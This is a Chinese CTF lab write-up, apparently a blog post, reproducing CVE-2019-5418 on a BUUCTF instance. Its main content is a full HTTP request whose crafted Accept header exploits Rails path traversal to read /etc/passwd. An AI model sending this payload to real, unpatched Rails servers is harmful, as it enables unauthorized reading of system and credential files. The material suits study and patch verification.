buuctf [Rails]CVE-2019-5418

漏洞描述

Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。它被宣传为现有企业框架的一个替代,而它的目标,就是让 Web 开发方面的生活,变得更轻松。在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。
https://www.freebuf.com/news/199617.html

漏洞影响

Ruby on Rails < 6.0.0.beta3
Ruby on Rails < 5.2.2.1
Ruby on Rails < 5.1.6.2
Ruby on Rails < 5.0.7.2

漏洞复现
在这里插入图片描述
正常访问http://node3.buuoj.cn:26318/robots,看到正常的robots.txt文件被读取出来。
在这里插入图片描述

抓包然后利用漏洞,发送如下数据包,读取/etc/passwd

GET /robots HTTP/1.1
Host: node3.buuoj.cn:26318
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept:../../../../../../../../etc/passwd{{
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=1785a4ff130456-0f22e64e92af97-4c3f227c-1fa400-1785a4ff131385; qSq_visitedfid=2; SESS95551f5ddaecb47376c20fedfc2d68a8=mqBaxWNzEDU58O5cN_rzfbqaJfPK0Lhjz130wXd_IIU; Drupal.toolbar.collapsed=0; _blog_session=zQn3GuUS6FuUDFOpZ%2FBYdZIDDhLmdATzJncf1YiGtdAU2do96VZ1hFsWO8a6HUAEUvaQ2fN4%2FmSMtGbad44EBS4oGYQepZX1M1ZxGoNkA7qUtmTwT1JKEl8ghXZCXpEqQdaDtCuCMxFvWZV7Kxo%3D--%2FrVvjt4BRBHRDloM--h3D1rLrPP8yhU%2FbYiazoAQ%3D%3D
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d0f5e23d446407dcb86942663b29a1a3"
Cache-Control: max-age=0

在这里插入图片描述
成功读取到/etc/passwd

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值